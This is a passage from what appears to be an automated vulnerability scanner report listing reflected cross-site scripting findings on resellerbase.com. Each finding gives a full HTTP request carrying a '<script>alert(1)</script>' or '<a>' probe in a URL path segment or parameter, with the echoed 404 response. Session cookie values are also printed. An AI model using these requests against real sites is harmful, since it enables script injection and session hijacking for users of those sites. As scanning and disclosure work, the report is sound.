User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&e6f6b<script>alert(1)</script>9ebc6e1f7eb=1 was not found on this server.</p>
...[SNIP]...

2.5475. http://www.resellerbase.com/web-service/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 3f97d<a>aefd10b45a1 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=23f97d<a>aefd10b45a1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=23f97d<a>aefd10b45a1 was not found on this server.</p>
...[SNIP]...

2.5476. http://www.resellerbase.com/web-service/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f560f<script>alert(1)</script>fcba932cdd3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicef560f<script>alert(1)</script>fcba932cdd3/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicef560f<script>alert(1)</script>fcba932cdd3/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5477. http://www.resellerbase.com/web-service/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5aa0a<script>alert(1)</script>a259ccd1c52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes5aa0a<script>alert(1)</script>a259ccd1c52/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes5aa0a<script>alert(1)</script>a259ccd1c52/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5478. http://www.resellerbase.com/web-service/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3bdd5<script>alert(1)</script>5b41faeff91 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos3bdd5<script>alert(1)</script>5b41faeff91/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos3bdd5<script>alert(1)</script>5b41faeff91/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5479. http://www.resellerbase.com/web-service/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bf141<script>alert(1)</script>f922cbd2239 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/search.phpbf141<script>alert(1)</script>f922cbd2239?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/search.phpbf141<script>alert(1)</script>f922cbd2239?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5480. http://www.resellerbase.com/web-service/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload affda<a>3abfaf01d98 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/kosmos/search.php?keyword=search...&Submit3=Searchaffda<a>3abfaf01d98&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/search.php?keyword=search...&Submit3=Searchaffda<a>3abfaf01d98&opt=2 was not found on this server.</p>
...[SNIP]...

2.5481. http://www.resellerbase.com/web-service/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 299cd<a>dbdc6d8f404 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/kosmos/search.php?keyword=search...299cd<a>dbdc6d8f404&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/search.php?keyword=search...299cd<a>dbdc6d8f404&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5482. http://www.resellerbase.com/web-service/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4890c<script>alert(1)</script>e853937a907 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&4890c<script>alert(1)</script>e853937a907=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&4890c<script>alert(1)</script>e853937a907=1 was not found on this server.</p>
...[SNIP]...

2.5483. http://www.resellerbase.com/web-service/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 62375<a>b5d516e031b was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=262375<a>b5d516e031b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=262375<a>b5d516e031b was not found on this server.</p>
...[SNIP]...

2.5484. http://www.resellerbase.com/web-service/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 340f2<script>alert(1)</script>82d18262140 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service340f2<script>alert(1)</script>82d18262140/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service340f2<script>alert(1)</script>82d18262140/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5485. http://www.resellerbase.com/web-service/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ac81<script>alert(1)</script>8b9132f228c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes5ac81<script>alert(1)</script>8b9132f228c/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes5ac81<script>alert(1)</script>8b9132f228c/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5486. http://www.resellerbase.com/web-service/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7704d<script>alert(1)</script>e4db7b9d900 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/search.php7704d<script>alert(1)</script>e4db7b9d900?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/search.php7704d<script>alert(1)</script>e4db7b9d900?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5487. http://www.resellerbase.com/web-service/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 874c9<a>975efc849fd was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/search.php?keyword=search...&Submit3=Search874c9<a>975efc849fd&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/search.php?keyword=search...&Submit3=Search874c9<a>975efc849fd&opt=2 was not found on this server.</p>
...[SNIP]...

2.5488. http://www.resellerbase.com/web-service/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 3d165<a>b857b9e73d0 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/search.php?keyword=search...3d165<a>b857b9e73d0&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/search.php?keyword=search...3d165<a>b857b9e73d0&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5489. http://www.resellerbase.com/web-service/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8d483<script>alert(1)</script>8a4bed2d572 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/search.php?keyword=search...&Submit3=Search&opt=2&8d483<script>alert(1)</script>8a4bed2d572=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/search.php?keyword=search...&Submit3=Search&opt=2&8d483<script>alert(1)</script>8a4bed2d572=1 was not found on this server.</p>
...[SNIP]...

2.5490. http://www.resellerbase.com/web-service/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload b277e<a>504ca73d96a was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/search.php?keyword=search...&Submit3=Search&opt=2b277e<a>504ca73d96a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/search.php?keyword=search...&Submit3=Search&opt=2b277e<a>504ca73d96a was not found on this server.</p>
...[SNIP]...

2.5491. http://www.resellerbase.com/web-service/web-hosting/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7498f<script>alert(1)</script>29f6c40a269449eb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service7498f<script>alert(1)</script>29f6c40a269449eb1/web-hosting/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service7498f<script>alert(1)</script>29f6c40a269449eb1/web-hosting/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.5492. http://www.resellerbase.com/web-service/web-hosting/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e4d36<script>alert(1)</script>f501cd8677a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicee4d36<script>alert(1)</script>f501cd8677a/web-hosting/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
